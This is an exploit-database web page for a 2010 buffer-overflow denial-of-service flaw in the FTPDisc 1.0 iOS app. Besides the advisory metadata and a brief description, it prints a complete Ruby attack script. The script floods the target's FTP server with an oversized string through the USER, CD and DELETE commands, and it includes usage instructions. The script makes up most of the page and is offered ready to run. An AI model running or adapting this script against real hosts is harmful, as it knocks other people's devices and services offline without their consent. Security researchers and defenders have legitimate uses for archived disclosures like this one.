header-logo
Suggest Exploit
vendor:
FTPDisc 1.0
by:
Alberto Ortega
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: FTPDisc 1.0
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:ftpdisc:ftpdisc:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: GNU/Linux (Sidux)
2010

iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS

This exploit is a remote denial of service exploit caused by buffer overflow. It is written in Ruby and tested on iPod Touch 3G 3.1.3. It is tested from GNU/Linux (Sidux) with a future PenTBox version. It has three exploits: 1 - USER [MALFORMED], 2 - cd [MALF], 3 - delete [MALF].

Mitigation:

The user should update to the latest version of FTPDisc 1.0 and FTPDisc 1.0 Lite.
Source

Exploit-DB raw data:

###############
# Title -> iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS
# Model -> Tested on iPod Touch 3G 3.1.3
# Software -> FTPDisc 1.0 and FTPDisc 1.0 Lite http://itunes.apple.com/es/app/ftpdisc-lite-pdf-reader/id329157971?mt=8
# Attacker -> Tested from GNU/Linux (Sidux), fuzzing with a future PenTBox version :P
#
# Exploit languaje -> Ruby
# Type -> Remote Denial of Service Exploit caused by Buffer Overflow
#
#
###############
# Discovered and written by Alberto Ortega
# http://pentbox.net/
###############

require "socket"
require "net/ftp"

expl = ARGV[0]
host = ARGV[1]

puts ""
if !expl || !host
	puts "HELP - iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS"
	puts ""
	puts "Exploits: 1 - USER [MALFORMED] 2 - cd [MALF] 3 - delete [MALF]"
	puts ""
	puts "- Usage: ftpdisc3io.rb [numberofexploit] [host]"
	puts "- Example: ftpdisc3io.rb 1 192.168.1.2"
	puts ""
else
	buffer = "A"
	10.times do
		buffer = "#{buffer}#{buffer}" # Here de big buffer to send
	end
	if expl == "1" # EXPLOIT 1
		begin
			socket = TCPSocket.new(host, 21)
			puts "[*] Exploiting ..."
			socket.write("USER #{buffer}\r\n")
			puts "[*] Succesfully exploited! :)"
		rescue
			puts "Connection problem"
		end
	elsif expl == "2" || expl == "3"
		begin
			print "[*] Connecting to FTP ... "
			ftp = Net::FTP.new(host, "anonymous")
			puts "OK"
			puts "[*] Exploiting ..."
			if expl == "2"
				begin
					ftp.chdir(buffer) # EXPLOIT 2
				rescue
				end
			else
				begin
					ftp.delete(buffer) # EXPLOIT 3
				rescue
				end
			end
			puts "[*] Succesfully exploited! :)"
		rescue
			puts "Connection problem"
		end
	else
		puts "Incorrect exploit selection (1, 2, 3)"
	end
end
puts ""

Navigation

Suggest Exploit

Services By CQR